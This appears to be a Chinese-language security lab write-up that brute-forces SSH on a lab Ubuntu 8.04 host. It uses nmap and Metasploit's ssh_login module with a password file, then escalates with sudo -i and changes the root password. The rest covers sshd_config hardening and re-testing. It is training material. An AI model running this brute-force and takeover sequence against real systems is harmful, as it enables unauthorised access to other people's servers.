网络安全: Kali Linux 进行 SSH 渗透与防御

目录

一、实验

1.环境

2.nmap扫描目标主机

[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)

[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)

二、问题

1.SSH有哪些安全配置


一、实验

1.环境

(1)主机

表1 主机

|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |

(2)查看Kali Linux (2022.4)系统版本

bash 复制代码
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

bash 复制代码
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

bash 复制代码
lsb_release -a
bash 复制代码
ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

bash 复制代码
msfconsole

(2) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(4)查看选项

bash 复制代码
show options

(5)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(6)运⾏脚本

bash 复制代码
run 

(7)查看会话

bash 复制代码
sessions

(8)连接会话

bash 复制代码
sessions 1

查看用户身份

bash 复制代码
whoami

查看路径

bash 复制代码
pwd

提升权限

bash 复制代码
 sudo -i

再次查看用户身份

bash 复制代码
whoami

更改密码

bash 复制代码
password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改端口

(2)重启

bash 复制代码
/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

bash 复制代码
msfconsole

(6) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(6) 使⽤编号为 0 的脚本

bash 复制代码
use 0

(7) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(8)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(9)运⾏脚本

失败

bash 复制代码
run 

(10)nmap扫描端口

ssh端口为12345

bash 复制代码
nmap -sV 192.168.204.143

(11)查看选项

bash 复制代码
show options

(12) 设置目标端口

bash 复制代码
set rport 12345

(13)运⾏脚本

bash 复制代码
run 

( 14)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

bash 复制代码
/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

bash 复制代码
vim /etc/ssh/sshd_config

修改容错次数

(18)重启

bash 复制代码
/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

bash 复制代码
Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

bash 复制代码
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

bash 复制代码
exit -y
相关推荐
北京搜维尔科技有限公司1 分钟前
搜维尔科技:【应用】Xsens在荷兰车辆管理局人体工程学评估中的应用
人工智能·安全
云起无垠19 分钟前
技术分享 | 大语言模型赋能软件测试:开启智能软件安全新时代
人工智能·安全·语言模型
Jason-河山19 分钟前
【自动化更新,让商品信息跳舞】——利用API返回值的幽默编程之旅
运维·自动化
饮浊酒23 分钟前
Linux操作系统 ------(3.文本编译器Vim)
linux·vim
lihuhelihu32 分钟前
第3章 CentOS系统管理
linux·运维·服务器·计算机网络·ubuntu·centos·云计算
哲讯智能科技34 分钟前
SAP Business One市场价格解析
运维·sap·erp
ac-er88881 小时前
PHP弱类型安全问题
开发语言·安全·php
矛取矛求1 小时前
Linux系统性能调优技巧
linux
山东布谷科技官方1 小时前
布谷直播源码部署服务器关于数据库配置的详细说明
运维·服务器·数据库·直播系统源码·直播源码·直播系统搭建·直播软件开发
One_Blanks1 小时前
渗透测试-Linux基础(1)
linux·运维·安全